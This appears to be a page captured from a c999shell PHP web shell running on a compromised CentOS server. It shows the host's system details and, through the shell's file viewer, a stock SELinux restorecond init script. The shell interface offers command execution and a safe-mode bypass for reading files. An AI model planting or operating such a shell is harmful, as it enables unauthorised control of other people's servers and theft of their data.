Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /etc/rc.d/rc0.d/ drwxr-xr-x |
Viewing file: K87restorecond (1.75 KB) -rwxr-xr-x Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | #!/bin/sh # # restorecond: Daemon used to maintain path file context # # chkconfig: 2345 12 87 # description: restorecond uses inotify to look for creation of new files \ # listed in the /etc/selinux/restorecond.conf file, and restores the \ # correct security context. # # processname: /usr/sbin/restorecond # config: /etc/selinux/restorecond.conf # pidfile: /var/run/restorecond.pid # # Return values according to LSB for all commands but status: # 0 - success # 1 - generic or unspecified error # 2 - invalid or excess argument(s) # 3 - unimplemented feature (e.g. "reload") # 4 - insufficient privilege # 5 - program is not installed # 6 - program is not configured # 7 - program is not running PATH=/sbin:/bin:/usr/bin:/usr/sbin # Source function library. . /etc/rc.d/init.d/functions [ -x /usr/sbin/selinuxenabled ] && /usr/sbin/selinuxenabled || exit 0 # Check that we are root ... so non-root users stop here test $EUID = 0 || exit 4 test -x /usr/sbin/restorecond || exit 5 test -f /etc/selinux/restorecond.conf || exit 6 RETVAL=0 start() { echo -n $"Starting restorecond: " unset HOME MAIL USER USERNAME daemon /usr/sbin/restorecond RETVAL=$? touch /var/lock/subsys/restorecond echo return $RETVAL } stop() { echo -n $"Shutting down restorecond: " killproc restorecond RETVAL=$? rm -f /var/lock/subsys/restorecond echo return $RETVAL } restart() { stop start } # See how we were called. case "$1" in start) start ;; stop) stop ;; status) status restorecond RETVAL=$? ;; restart|reload) restart ;; condrestart) [ -e /var/lock/subsys/restorecond ] && restart || : ;; *) echo $"Usage: $0 {start|stop|restart|reload|condrestart}" RETVAL=3 esac exit $RETVAL |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0059 ]-- |